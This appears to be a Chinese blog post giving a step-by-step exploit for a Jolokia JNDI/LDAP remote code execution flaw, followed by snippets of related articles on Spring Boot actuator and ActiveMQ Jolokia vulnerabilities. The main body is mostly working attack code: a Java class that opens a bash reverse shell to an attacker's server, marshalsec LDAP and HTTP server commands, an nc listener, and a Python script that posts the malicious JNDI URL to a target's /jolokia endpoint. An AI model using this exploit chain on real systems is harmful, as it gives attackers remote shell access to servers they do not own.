Jolokia RCE漏洞利用

最新推荐文章于 2024-07-27 09:11:15 发布
最新推荐文章于 2024-07-27 09:11:15 发布
阅读量3k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38844729/article/details/110388403
版权
本文详细介绍了如何利用Java LDAP远程代码执行漏洞进行攻击,包括编写Exploit.java并编译,通过HTTP服务器分发,设置LDAP服务器,使用nc监听,以及通过JMX接口触发漏洞的完整步骤。同时提供了参考链接深入理解该漏洞。
摘要由CSDN通过智能技术生成

利用步骤

1、编译java利用代码,将其命名为Exploit.java,然后编译生成class文件:javac Exploit.java

public class Exploit {
  public Exploit() {
    try {
      System.setSecurityManager(null);
      java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp/VPS地址/7777 0>&1`");
    } catch(Exception e) {
      e.printStackTrace();
    }
  }
}

2、在Exploit.java目录下开启一个web服务

python3 -m http.server 80

3、运行LDAP服务器在1389端口
marshalsec-0.0.3-SNAPSHOT-all.jar下载地址

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS地址/#Exploit 1389

4、nc开启监听

nc -lvp 7777

5、执行exp

import requests
#url = 'http://x.x.x.x/jolokia/..;/jolokia/'
url = 'http://x.x.x.x/jolokia'
headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
        "Content-Type": "application/x-www-form-urlencoded",
        }
data = '''{
    "type" : "read",
    "mbean" : "java.lang:type=Memory",
    "target" : {
         "url" : "service:jmx:rmi:///jndi/ldap://VPS地址:1389/Exploit"
    }
}'''
result = requests.post(url, headers=headers, data=data, timeout=5)

参考文章

https://xz.aliyun.com/t/2294
https://www.cnblogs.com/cwkiller/p/13397335.html

Franchi小白帽
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Springboot之actuator配置不当漏洞RCEjolokia
墨痕诉清风的博客
10-25 4670
日穿扫描扫到一个spring boot actuator 可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字 可以使用jolokia-realm-jndi-rce具体步骤如下 先用python3开一个web服务 python3 -m http.server 8080 编译java利用代码 /** * javac -source 1.5 -target 1.5 JNDIObject.java * * Buil..
阿里云java源码-Spring-Boot-Actuator-Exploit:SpringBootActuator(jolokia)XXE/R
06-06
阿里云java源码Spring Boot Actuator (jolokia) XXE/RCE 来自以下文章的信息和有效载荷: 28/02/2020 编辑:另一篇使用 H2 数据库实现 RCE 的文章 在 Spring Boot Actuator < 2.0.0 和 Jolokia 1.6.0 上测试。 如果您可以使用 Spring Boot Actuator 和以下资源访问以下资源/actuator/jolokia或/jolokia : reloadByURL ,这篇文章可以帮助您利用 XXE 并最终利用 RCE。 设置环境: git clone https://github.com/artsploit/actuator-testbed cd actuator-testbed mvn install mvn spring-boot:run 1. jolokia XXE 如果操作reloadByURL存在,则可以从外部 URL 重新加载日志记录配置: logback 背后的 XML 解析器是 SAXParser。 我们可以利用此功能触发基于以下有效负载的 XXE 带外错误: # fil
Spring Boot jolokia 配置不当导致RCE漏洞
Bird&Bird
03-16 4235
访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词。根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过。环境运行起来后,访问一下/jolokia接口。
Apache ActiveMQ jolokia 远程代码执行漏洞
时光不老的博客
11-29 2163
该漏洞存在于Jolokia服务的请求处理方式中,结合ActiveMQ的配置不当和Java的高级功能,允许已认证的用户通过发送特定格式的HTTP请求来执行危险操作。ActiveMQ的内部配置允许org.jolokia.http.AgentServlet处理来自/api/jolokia的请求,而没有足够的安全检查来防止恶意操作。
Spring actuator Jolokia XXE RCE实现(持续更新)
qq_36737214的博客
12-02 1052
背景:今天想实践一下actuator Jolokia XXE RCE的复现;复现过程中出现了很多的名词之前是没接触到的,就一此次复现做一个契机,补充一下自己需要知道的知识点 文章目录搭建HTTP服务器。供JMXConfigurator中提供的“reloadByURL”方法,引入外部xml文件。解析外部引入的xml,对插入JNDI部分解析并进行创建JNDI服务 需要了解的知识点如下:其中的每一点我基本上都会先一篇文章去整理。 思维导图地址地址:https://www.processon.com/mindm
高版本JDK下的Jolokia Realm JNDI RCE小记
weixin_40418457的博客
05-05 3069
0x01 引言 在一个阳光明媚的下午,接到一个渗透测试项目。经过一波资产收集,发现一处jolokia,存在 type=MBeanFactory 和 createJNDIRealm。 https://api.example.com//actuator/jolokia/list 你没看错,这个资源必须//才能访问到。 0x02 一波三折的RCE 1. 本着面向github渗透,利用公开的poc打了一波。 引用:https://github.com/LandGrey/SpringBootVulExploit#
web应用漏洞.docx
07-05
1. ADOBE ColdFusion Java RMI 反序列化 RCE 漏洞:攻击者可以通过该漏洞执行任意代码。 2. BEESCMS admin/login.php SQL 注入漏洞:攻击者可以通过该漏洞执行任意 SQL 语句。 3. Discuz X2.5 /source/class/class_...
jolokia-war-1.6.0.war
03-01
jolokia-war-1.6.0.war 不需要再用JXM监控了 https://jolokia.org/reference/html/index.html
jolokia-war-unsecured-1.6.0
03-01
jolokia-war-1.6.0.war 不需要再用JXM监控了 ,这个是免密的https://jolokia.org/reference/html/index.html
jolokia-core-1.6.1.jar
02-25
java运行依赖jar包
jolokia logback JNDI RCE
12-08 1441
jolokia logback JNDI RCE漏洞分析
ActiveMQ Jolokia 代码执行漏洞(CVE-2022-41678)复现
huangyongkang666的博客
12-05 2102
ActiveMQ后台存在Jolokia 代码执行漏洞,在ActiveMQ中,经过身份验证的远程攻击者下可通过/api/jolokia/接口操作MBean,成功利用此漏洞可导致远程代码执行
jolokia Realm JNDI RCE分析
12-09 2587
jolokia Realm JNDI RCE分析
Spring actuator Jolokia XXE RCE
qq_35533398的博客
10-07 1574
Jolokia XXE/RCE Jolokia允许通过HTTP访问所有已注册的MBean,同时可以使用URL列出所有可用的MBeans操作,访问http://127.0.0.1:8090/jolokia/list即可列出,如下为返回: 格式化后logback Mbean: jolokia在logback JMXConfigurator中提供的“reloadByURL”方法允许从外部URL重新加载日志的记录配置 官网给出了GET和POST两种方式的访问路径以及参数: ..
jdk8u121以上 jolokia Realm JNDI RCE解决
为之的博客
12-02 1303
我的版本为java1.8.0_152,比121高,但我想对其进行debug,又不想重装jdk或者虚拟机远程debug,就找了半天怎么解决,然后百度都是告诉你 com.sun.jndi.rmi.object.trustURLCodebase设置为true就好了,就始终没人教教我这个菜鸡怎么设置。 Environment要点一下扩展开,在里面输入命令点击OK就解决了,哎,太菜了。 -Dcom.sun.jndi.rmi.object.trustURLCodebase=true ...
SpringBoot历史漏洞复现_springboot漏洞,经典实战教程
m0_60707685的博客
04-08 2410
2.找到属性名,使用bp抓包,抓/jolokia的包,发送到重发模块,修改包为post请求,把传输的变量改json,然后加上下面的poc,重放这个包,明文值结果包含 在 response 数据包中的 value 键中。注意:每个1.x 版本和2.x 版本不同。
认识漏洞-文件上传、金山终端安全系统、ActiveMQ jolokia RCE
最新发布
Boom!脑洞大爆炸的博客
07-27 277
认识漏洞-文件上传、金山终端安全系统、ActiveMQ jolokia RCE
Apache ActiveMQ Jolokia 远程代码执行漏洞复现(CVE-2022-41678)
qq_53733257的博客
12-07 1892
不太会调试,所以复现得很困难,踩了不少坑,记录此篇,比较详细。Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2022-41678)分析 | l3yx's blog。
spring boot相关漏洞之零散笔记
qq_45233918的博客
12-21 3337
这是2016年爆出的一个洞,利用条件是使用了springboot的默认错误页(Whitelabel Error Page),存在漏洞的页面在:/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/web/ErrorMvcAutoConfiguration.java。可以通过 /jolokia/list 接口寻找可以利用的 MBean,间接触发相关 RCE 漏洞、获得星号遮掩的重要隐私信息的明文等。
Activemq Jolokia
05-24
Activemq是一种流行的开源消息传递中间件,用于在应用程序、服务和系统之间传递异步消息。 Jolokia是一个开源项目,它提供了一种远程JMX(Java Management Extensions)访问方法,可以通过HTTP协议访问JMX MBeans,使得JMX管理更加容易和灵活。在Activemq中,可以使用Jolokia来远程访问和管理Activemq的JMX MBeans。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值